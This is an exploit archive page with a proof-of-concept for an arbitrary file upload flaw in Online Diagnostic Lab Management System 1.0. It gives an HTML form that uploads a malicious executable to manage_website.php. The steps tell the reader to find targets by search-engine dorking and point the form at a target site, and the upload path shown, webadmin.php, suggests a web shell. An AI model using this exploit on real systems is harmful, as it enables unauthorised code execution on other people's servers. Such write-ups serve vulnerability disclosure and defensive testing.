Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]
- Online Diagnostic Lab Management System 1.0 Arbitrary File Upload[6]
- Authored by indoushka[7]
-
Online Diagnostic Lab Management System version 1.0 suffers from an arbitrary file upload vulnerability.
- SHA-256 |
978b02141f2137df791b40707a42365e446471161ea7eb4df651cfd5ff222dd8 - Download[8] | Favorite[9] | View[10]
Change Mirror[11] Download[12]
=============================================================================================================================================
| # Title : Online Diagnostic Lab Management System v1.0 Remote File Upload Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |
| # Vendor : https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html |
=============================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] The following html code uploads a executable malicious file remotely .
[+] Go to the line 9.
[+] Set the target site link Save changes and apply .
[+] infected file : diagnostic/manage_website.php.
[+] save code as poc.html .
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Upload Website Image</title>
</head>
<body>
<form action="http://127.0.0.1/diagnostic/manage_website.php" method="POST" enctype="multipart/form-data">
<label for="website_image">Upload Website Image:</label>
<input type="file" id="website_image" name="website_image" required>
<button type="submit" name="btn_web">Submit</button>
</form>
</body>
</html>
[+] http://127.0.0.1/diagnostic/assets/uploadImage/Logo/webadmin.php
Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================
File Tags
- ActiveX[18] (933)
- Advisory[19] (86,512)
- Arbitrary[20] (16,895)
- BBS[21] (2,859)
- Bypass[22] (1,867)
- CGI[23] (1,034)
- Code Execution[24] (7,826)
- Conference[25] (691)
- Cracker[26] (844)
- CSRF[27] (3,407)
- DoS[28] (25,102)
- Encryption[29] (2,389)
- Exploit[30] (53,250)
- File Inclusion[31] (4,263)
- File Upload[32] (998)
- Firewall[33] (822)
- Info Disclosure[34] (2,891)
- Intrusion Detection[35] (916)
- Java[36] (3,144)
- JavaScript[37] (899)
- Kernel[38] (7,226)
- Local[39] (14,800)
- Magazine[40] (587)
- Overflow[41] (13,176)
- Perl[42] (1,435)
- PHP[43] (5,225)
- Proof of Concept[44] (2,394)
- Protocol[45] (3,727)
- Python[46] (1,646)
- Remote[47] (31,676)
- Root[48] (3,638)
- Rootkit[49] (527)
- Ruby[50] (632)
- Scanner[51] (1,657)
- Security Tool[52] (8,029)
- Shell[53] (3,277)
- Shellcode[54] (1,217)
- Sniffer[55] (902)
- Spoof[56] (2,278)
- SQL Injection[57] (16,614)
- TCP[58] (2,441)
- Trojan[59] (690)
- UDP[60] (904)
- Virus[61] (670)
- Vulnerability[62] (33,010)
- Web[63] (9,969)
- Whitepaper[64] (3,782)
- x86[65] (967)
- XSS[66] (18,260)
- Other[67]
File Archives
- August 2024[68]
- July 2024[69]
- June 2024[70]
- May 2024[71]
- April 2024[72]
- March 2024[73]
- February 2024[74]
- January 2024[75]
- December 2023[76]
- November 2023[77]
- October 2023[78]
- September 2023[79]
- Older[80]
Systems
- AIX[81] (429)
- Apple[82] (2,099)
- BSD[83] (377)
- CentOS[84] (58)
- Cisco[85] (1,927)
- Debian[86] (7,107)
- Fedora[87] (1,693)
- FreeBSD[88] (1,246)
- Gentoo[89] (4,567)
- HPUX[90] (880)
- iOS[91] (378)
- iPhone[92] (108)
- IRIX[93] (220)
- Juniper[94] (69)
- Linux[95] (50,868)
- Mac OS X[96] (691)
- Mandriva[97] (3,105)
- NetBSD[98] (256)
- OpenBSD[99] (489)
- RedHat[100] (16,606)
- Slackware[101] (941)
- Solaris[102] (1,611)
- SUSE[103] (1,444)
- Ubuntu[104] (9,764)
- UNIX[105] (9,439)
- UnixWare[106] (187)
- Windows[107] (6,674)
- Other[108]
- Services
- Security Services[119]
- Hosting By
- Rokasec[120]


